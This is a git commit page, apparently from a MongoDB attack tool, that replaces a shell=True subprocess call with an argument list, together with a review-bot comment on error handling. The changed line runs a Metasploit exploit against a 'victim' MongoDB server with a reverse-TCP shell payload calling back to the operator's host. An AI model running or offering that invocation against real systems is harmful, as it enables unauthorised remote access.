Commit 3db58ae

Avoid shell=True in subprocess.call()
The code doesn't need the shell for anything so this should be more efficient, as well as potentially more secure, and hopefully instructive for readers of the code. See also https://stackoverflow.com/questions/3172470/actual-meaning-of-shell-true-in-subprocess
1 parent 9f9890f commit 3db58ae

1 file changed

+1
-1
lines changed

nsmmongo.py

Lines changed: 1 addition & 1 deletion
@@ -338,7 +338,7 @@ def enumDbs (mongoConn):
338338

339339
def msfLaunch():
340340
try:
341-
proc = subprocess.call("msfcli exploit/linux/misc/mongod_native_helper RHOST=" + str(victim) +" DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" + str(myIP) + " LPORT="+ str(myPort) + " E", shell=True)
341+
proc = subprocess.call(["msfcli", "exploit/linux/misc/mongod_native_helper", "RHOST=%s" % victim, "DB=local", "PAYLOAD=linux/x86/shell/reverse_tcp", "LHOST=%s" % myIP, "LPORT=%s" % myPort, "E"])
342342

343343
except:
344344
print "Something went wrong. Make sure Metasploit is installed and path is set, and all options are defined."
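
Review bot: On new line 341, proc receives the exit status of msfcli, and nothing in the visible lines checks it. subprocess.call() does not raise on a non-zero exit, so the bare except: at line 343 only fires when the process cannot be started (OSError, for example when msfcli is not on PATH), and a run that starts but fails prints nothing. Suggest testing proc != 0, or switching to subprocess.check_call, and narrowing the handler to except (OSError, subprocess.CalledProcessError): so that KeyboardInterrupt and unrelated errors are not reported as a Metasploit setup problem. With the list form, victim, myIP and myPort each reach msfcli as a single argv entry with no shell parsing, which is the security gain here; validating them as an address and a port before the call would still give a clearer error than whatever msfcli reports for a malformed value.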
